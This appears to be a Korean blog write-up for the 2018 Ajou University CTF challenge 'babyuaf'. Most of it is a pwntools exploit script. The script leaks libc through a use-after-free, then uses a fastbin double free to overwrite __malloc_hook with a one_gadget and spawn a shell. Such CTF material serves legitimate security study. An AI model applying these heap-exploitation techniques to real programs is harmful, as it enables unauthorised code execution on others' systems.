babyuaf 0.01MB
from pwn import * context.terminal=["terminator", "-e"] p = process('./babyuaf') e = ELF('./babyuaf') libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') main_arana_offset = 0x3c4b20 free_hook_offset = libc.symbols['__free_hook'] one_gadget = [0x45226,0x4527a,0xf0364,0xf1207] # ldd local libc def add_info(name, age, comment): p.sendlineafter('> ', "1") p.sendafter('name : ', name) p.sendafter('age : ', str(age)) p.sendafter('comment : ', comment) def delete_info(index): p.sendlineafter('> ', "2") p.sendlineafter('(0~4) : ', str(index)) def view_info(index): p.sendlineafter('> ', "3") p.sendlineafter('(0~4) : ', str(index)) def add_memo(size, memo): p.sendlineafter('> ', "4") p.sendafter('size : ', str(size)) p.sendafter('memo : ', memo) def delete_memo(index): p.sendlineafter('> ', "5") p.sendlineafter('(0~4) : ', str(index)) #uaf add_info("A"*0x18, "100", "B"*0x10) # unsorted bin chunk add_memo(16, "C"*8) delete_info(0) add_info("D"*8, "200", "E"*8) view_info(0) #main_arena+88 leak p.recvuntil('DDDDDDDD') leak = u64(p.recvuntil("\x7f")[-6:] + "\x00\x00") # libc_leak libc_leak = leak - 88 - main_arana_offset free_hook = libc_leak + free_hook_offset malloc_hook = libc_leak + libc.symbols['__malloc_hook'] one_shot = libc_leak + one_gadget[3] log.info('main_arena+88 leak : {}'.format(hex(leak))) log.info('libc_leak : {}'.format(hex(libc_leak))) log.info('free_hook : {}'.format(hex(free_hook))) #DFG를 이용하여 원하는곳에 값을 쓸 수 있다. add_memo(89, "a"*8) # 0x7f범위를 맞춰주기 위하여 89로 함. add_memo(89, "b"*8) delete_info(0) delete_memo(1) delete_memo(2) delete_memo(1) #DFG를 이용, malloc_hook-35(0x7f)쪽에 fake chunk을 생성 add_memo(89, p64(malloc_hook-35)) add_memo(89, "c"*8) add_memo(89, "d"*8) add_memo(89, "e"*19+p64(one_shot)+p64(0)*20) # malloc_hook을 one_shot가젯으로 덮는다! #after > -> choose 1 -> malloc -> __malloc_hook(one_shot) -> shell! p.interactive()
2018 아주대 사이버보안학과 ctf - babyuaf
Binary
Mitigation
Exploit
'Pwnable' 카테고리의 다른 글